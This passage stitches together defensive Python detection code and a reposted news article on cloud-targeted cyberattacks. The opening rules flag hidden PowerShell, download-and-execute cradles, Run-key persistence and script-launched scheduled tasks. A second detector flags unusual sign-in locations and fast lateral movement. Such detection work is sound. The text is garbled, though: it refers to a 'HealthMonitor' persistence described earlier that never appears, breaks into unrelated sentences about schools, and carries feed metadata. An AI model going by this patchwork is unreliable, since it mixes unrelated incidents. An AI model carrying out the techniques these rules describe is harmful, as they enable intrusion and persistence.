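TEMP_PATH = re.compile(r"\$env:temp|%temp%|\\appdata\\local\\temp", IC)
# Autostart registry locations and the verbs that write to them.
RUN_KEY = re.compile(r"currentversion\\run(?:once)?\b", IC)
REG_WRITE = re.compile(r"new-item(?:property)?|set-itemproperty|\breg(?:\.exe)?\s+add\b", IC)
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe")


def _is_powershell(event: Dict[str, str]) -> bool:
    return event["image"].lower().endswith(("powershell.exe", "pwsh.exe"))


# Each rule is (name, predicate). Names double as the alert title.
RULES: List[Tuple[str, Callable[[Dict[str, str]], bool]]] = [
    ("hidden_bypass_powershell",
     lambda e: _is_powershell(e) and bool(HIDDEN_WINDOW.search(e["cmd"]))
     and bool(EXEC_BYPASS.search(e["cmd"]))),
    ("download_then_execute",
     lambda e: _is_powershell(e) and bool(DOWNLOAD_CRADLE.search(e["cmd"]))
     and bool(EXECUTE_AFTER.search(e["cmd"]) or TEMP_PATH.search(e["cmd"]))),
    ("run_key_persistence",
     lambda e: bool(RUN_KEY.search(e["cmd"])) and bool(REG_WRITE.search(e["cmd"]))),
    # Task creation by a script interpreter is rare in normal administration.
    ("schtasks_create_from_script_host",
     lambda e: e["image"].lower().endswith("schtasks.exe")
     and "/create" in e["cmd"].lower()
     and e["parent"].lower().endswith(SCRIPT_HOSTS)),
]


def evaluate(event: Dict[str, str]) -> List[str]:
    """Names of every rule the event trips, in rule order."""
    return [name for name, predicate in RULES if predicate(event)]


def scan(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Map event id to its rule hits, omitting events that trip nothing."""
    findings: Dict[str, List[str]] = {}
    for event in events:
        hits = evaluate(event)
        if hits:
            findings[event["id"]] = hits
    return findings


if __name__ == "__main__":
    for event_id, hits in scan(SAMPLE_EVENTS).items():
        print(event_id, hits)
```

The parent-process field is what separates the schtasks rule from noise: an administrator creating a task from the Task Scheduler UI has a different parent than a task created by a PowerShell stage, which is exactly the shape of the “HealthMonitor” persistence described earlier.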

The malware then maintains a low profile, carefully exfiltrating data while avoiding detection by security monitoring tools.

While investigations continue, schools are implementing enhanced security measures while ensuring that critical educational functions remain operational, including scheduled testing and student access to learning resources.

Over 90% of Cybersecurity Leaders Worldwide Encountered Cyberattacks Targeting Cloud Environments https://cybersecuritynews.com/cybersecurity-leaders-encountered-cyberattacks/ Thu, 01 May 2025 08:41:37 +0000 https://cybersecuritynews.com/?p=103433 In what security experts are describing as a “distributed crisis,” a staggering 90% of cybersecurity and IT leaders worldwide reported experiencing cyberattacks targeting their cloud environments within the past year. This alarming statistic emerges from comprehensive research conducted across ten countries, highlighting the increasing vulnerability of organizations as they transition from on-premises systems to hybrid […]

The post Over 90% of Cybersecurity Leaders Worldwide Encountered Cyberattacks Targeting Cloud Environments appeared first on Cyber Security News.

In what security experts are describing as a “distributed crisis,” a staggering 90% of cybersecurity and IT leaders worldwide reported experiencing cyberattacks targeting their cloud environments within the past year.

This alarming statistic emerges from comprehensive research conducted across ten countries, highlighting the increasing vulnerability of organizations as they transition from on-premises systems to hybrid cloud infrastructures.

The study, which surveyed more than 1,600 IT and security leaders, reveals that despite increased investment in cloud security, threat actors continue to find success in breaching these environments.

The nature of cloud-targeted attacks has evolved dramatically, with adversaries shifting away from traditional malware-based approaches toward more sophisticated identity-based intrusion methods.

According to the research, malware-free activity now accounts for 79% of all detected intrusions, a significant increase from just 40% in 2019.

This paradigm shift reflects attackers’ adaptation to modern enterprise environments, where they increasingly exploit valid credentials, engage in hands-on-keyboard intrusions, and deploy social engineering tactics to bypass conventional security measures.

The impact of these breaches has been severe, with 86% of organizations that experienced ransomware attacks ultimately paying the demanded ransom to recover their data or halt the attack.

Even more concerning, 74% of victims reported that attackers were able to harm backup and recovery options, effectively eliminating safety nets designed to mitigate such incidents.

Rubrik Zero Labs researchers identified a particularly troubling trend in their analysis: the dramatic reduction in “breakout time” – the period between initial compromise and lateral movement across systems.

“In 2024, the average breakout time for interactive eCrime intrusions fell to 48 minutes, down from 62 minutes in 2023,” noted security analysts.

“Alarmingly, the fastest breakout was recorded at just 51 seconds, meaning defenders may have less than a minute to detect and respond before attackers establish deeper control.”

The Rise of Identity-Based Attack Vectors

The report provides detailed insight into how identity-based attacks have become the preferred method for cloud environment infiltration.

Rather than breaking in through security vulnerabilities, attackers are simply logging in using compromised credentials.

This approach proves particularly effective in cloud and SaaS environments where traditional perimeter defenses offer limited protection.

Valid account abuse was responsible for 35% of cloud-related incidents, reflecting attackers’ growing focus on identity compromise as a gateway to broader enterprise environments.

Microsoft’s security telemetry supports this finding, revealing that they block over 600 million identity-based attacks daily.

These attacks typically begin with credential harvesting through phishing campaigns or purchase of stolen credentials from access brokers, whose activity surged by nearly 50% compared to the previous year.

The attack sequence typically progresses as follows:

Initial Access (compromised credentials) → 
    Cloud Environment Access → 
        Lateral Movement (using management tools) → 
            Privilege Escalation → 
                Data Discovery & Exfiltration
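The sequence above, together with the breakout-time figures quoted earlier, suggests two checks a defender can run over cloud audit logs: whether a successful sign-in came from a location the account has never used, and how many minutes passed between that sign-in and the first lateral-movement action. The following is an added Python example, not code from Rubrik Zero Labs or from the article; the event fields, action names, per-user country baseline and sample events are all constructed for illustration, and the 60-minute threshold is a tuning knob, not a recommendation from the report.

```python
from datetime import datetime
from typing import Dict, List, Optional, Set, Tuple

# Actions that mean an intruder is moving beyond the initial foothold:
# assuming another role, granting roles, minting keys, crossing accounts.
# Names are constructed; map them to your provider's audit event types.
LATERAL_ACTIONS = {"assume_role", "add_role_member", "create_access_key", "cross_account_access"}

# Constructed baseline: countries each user has signed in from historically.
BASELINE_COUNTRIES: Dict[str, Set[str]] = {"jdoe": {"US"}, "asmith": {"US", "CA"}}

# Constructed cloud audit events (UTC): (timestamp, user, action, country, target).
SAMPLE_EVENTS: List[Tuple[str, str, str, str, str]] = [
    ("2024-05-06T02:10:00", "jdoe", "login", "RO", ""),
    ("2024-05-06T02:14:00", "jdoe", "enumerate_users", "RO", "directory"),
    ("2024-05-06T02:31:00", "jdoe", "assume_role", "RO", "billing-admin"),
    ("2024-05-06T02:40:00", "jdoe", "download", "RO", "customer-export.csv"),
    ("2024-05-06T09:00:00", "asmith", "login", "CA", ""),
    ("2024-05-06T09:05:00", "asmith", "read", "CA", "q1-report.pdf"),
    ("2024-05-06T13:00:00", "asmith", "assume_role", "CA", "reporting-reader"),
]


def analyze(events: List[Tuple[str, str, str, str, str]],
            baseline: Dict[str, Set[str]],
            max_breakout_minutes: float = 60) -> Dict[str, dict]:
    """Per user: did the login come from an unseen country, and how quickly did
    the session reach lateral movement? Either signal flags the session.

    Simplification: one session per user (the most recent login). A real
    detector keys sessions on the provider's session or token identifier.
    """
    sessions: Dict[str, dict] = {}
    for ts_str, user, action, country, target in sorted(events):
        ts = datetime.fromisoformat(ts_str)
        if action == "login":
            sessions[user] = {
                "login_at": ts,
                "country": country,
                "unknown_location": country not in baseline.get(user, set()),
                "breakout_minutes": None,   # filled by the first lateral action
                "first_lateral": None,
            }
            continue
        session = sessions.get(user)
        if session is None:
            continue  # activity with no observed login: out of scope for this check
        if action in LATERAL_ACTIONS and session["breakout_minutes"] is None:
            elapsed = (ts - session["login_at"]).total_seconds() / 60
            session["breakout_minutes"] = elapsed
            session["first_lateral"] = f"{action}:{target}"
    for session in sessions.values():
        fast = (session["breakout_minutes"] is not None
                and session["breakout_minutes"] < max_breakout_minutes)
        session["flagged"] = session["unknown_location"] or fast
    return sessions


def flagged_users(events: List[Tuple[str, str, str, str, str]],
                  baseline: Dict[str, Set[str]]) -> List[str]:
    """Convenience wrapper: sorted list of users whose session was flagged."""
    return sorted(u for u, s in analyze(events, baseline).items() if s["flagged"])


if __name__ == "__main__":
    for user, session in analyze(SAMPLE_EVENTS, BASELINE_COUNTRIES).items():
        print(user, session["country"], session["breakout_minutes"], session["flagged"])
```

In the constructed data, jdoe signs in from a country outside the baseline and assumes a privileged role 21 minutes later, well inside the average breakout window the report describes, so the session is flagged on both counts; asmith signs in from a known country and takes four hours to assume a read-only role, and is left alone. The point of measuring breakout time on your own logs is to know whether alerting and response actually fit inside it.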

To counter this growing threat, the report recommends organizations adopt a comprehensive strategy that includes improved visibility into cloud environments, identity protection measures, and robust backup capabilities that mirror the rigor traditionally applied to on-premises systems.

Without this unified approach to data protection, organizations remain vulnerable to increasingly sophisticated cloud-targeted attacks that move at unprecedented speed.
